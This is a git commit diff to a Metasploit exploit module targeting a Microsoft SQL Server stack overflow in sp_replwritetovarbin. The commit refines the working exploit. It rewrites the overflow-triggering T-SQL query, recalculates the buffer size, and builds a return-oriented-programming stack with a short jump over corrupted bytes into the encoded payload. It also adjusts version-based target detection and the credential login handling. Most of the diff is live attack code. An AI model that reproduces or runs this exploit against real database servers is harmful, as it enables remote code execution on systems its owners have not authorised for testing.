cleanup exceptions, optimize query length, add some entropy
git-svn-id: file:///home/svn/framework3/trunk@8153 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
7c402d1d79
commit
477468147b
|
@ -40,10 +40,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
4. On MSSQL 2005, an additional vtable ptr is smashed, which is referenced with
|
||||
a displacement of 4. This pointer is not used by this exploit.
|
||||
|
||||
This particular exploit replaces the previous dual-method exploit. It uses
|
||||
This particular exploit replaces the previous dual-method exploit. It uses
|
||||
a technique where the value contained in ecx becomes the stack. From there,
|
||||
return oriented programming is used to normalize the execution state and
|
||||
finally execute the payload via a "jmp esp". All addresses used were found
|
||||
finally execute the payload via a "jmp esp". All addresses used were found
|
||||
within the sqlservr.exe memory space, yielding very reliable code execution
|
||||
using only a single query.
|
||||
},
|
||||
|
@ -253,9 +253,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
# since we need to have credentials for this vuln, we just login and run a query
|
||||
# to get the version information
|
||||
version = mssql_query_version
|
||||
if not version
|
||||
return Exploit::CheckCode::Detected
|
||||
if not (version = mssql_query_version)
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
print_status("@@version returned:\n\t" + version)
|
||||
|
||||
|
@ -278,7 +277,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
print_status("Attempting automatic target detection...")
|
||||
|
||||
version = mssql_query_version
|
||||
raise RuntimError, "Unable to get version!" if not version
|
||||
raise RuntimeError, "Unable to get version!" if not version
|
||||
|
||||
if (version =~ /8\.00\.194/)
|
||||
mytarget = targets[1]
|
||||
|
@ -307,12 +306,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
mytarget = target
|
||||
end
|
||||
|
||||
sqlquery = %Q|declare @i int,@buf nvarchar(4000)
|
||||
set @buf='declare @e int,@b varbinary,@l int;'
|
||||
set @buf=@buf+'exec master.dbo.sp_replwritetovarbin %NUM%,@e out,@b out,@l out,''%STUFF%'','''
|
||||
set @buf=@buf+'1'',''2'',''3'',''4'',''5'',''6'',''7'',''8'''
|
||||
exec master..sp_executesql @buf
|
||||
|
|
||||
sqlquery = %Q|declare @i int,@z nvarchar(4000)
|
||||
set @z='declare @e int,@b varbinary,@l int;'
|
||||
set @z=@z+'exec sp_replwritetovarbin %NUM%,@e out,@b out,@l out,''%STUFF%'',@l,@l,@l,@l,@l,@l,@l,@l'
|
||||
exec sp_executesql @z|
|
||||
|
||||
# just crash it with a pattern buffer if the CRASHER target is selected..
|
||||
if mytarget.name == 'CRASHER'
|
||||
|
@ -331,9 +328,10 @@ exec master..sp_executesql @buf
|
|||
first_esp = mytarget['Popped']
|
||||
fix_esp = mytarget['FixESP']
|
||||
writable = mytarget['Writable']
|
||||
|
||||
corruptable_bytes = 0x44
|
||||
|
||||
# make sploit buff
|
||||
sz = (num + vt_off) + esp_off + 6 + 2 + 0x38 + payload.encoded.length
|
||||
sz = (num + vt_off) + esp_off + (2 + corruptable_bytes) + payload.encoded.length
|
||||
#sploit = Rex::Text.pattern_create(sz)
|
||||
sploit = rand_text_alphanumeric(sz)
|
||||
|
||||
|
@ -357,8 +355,8 @@ exec master..sp_executesql @buf
|
|||
stack << mytarget['Ret']
|
||||
stack = stack.pack('V*')
|
||||
# jump over the stuff that gets corrupted
|
||||
stack << "\xeb\x38"
|
||||
stack << "\xcc" * 0x38
|
||||
stack << "\xeb" + [corruptable_bytes].pack('C')
|
||||
stack << rand_text_alphanumeric(corruptable_bytes)
|
||||
stack << payload.encoded
|
||||
sploit[stack_off,stack.length] = stack
|
||||
|
||||
|
@ -447,9 +445,10 @@ exec master..sp_executesql @buf
|
|||
def mssql_query_version
|
||||
begin
|
||||
logged_in = mssql_login_datastore
|
||||
rescue ::ConnectionRefused
|
||||
raise RuntimeError, "Unable to connect: connection refused"
|
||||
rescue ::Rex::ConnectionError, ::Errno::ECONNRESET, ::Errno::EINTR
|
||||
return nil
|
||||
end
|
||||
|
||||
if (not logged_in)
|
||||
raise RuntimeError, "Invalid SQL Server credentials"
|
||||
end
|
||||
|
|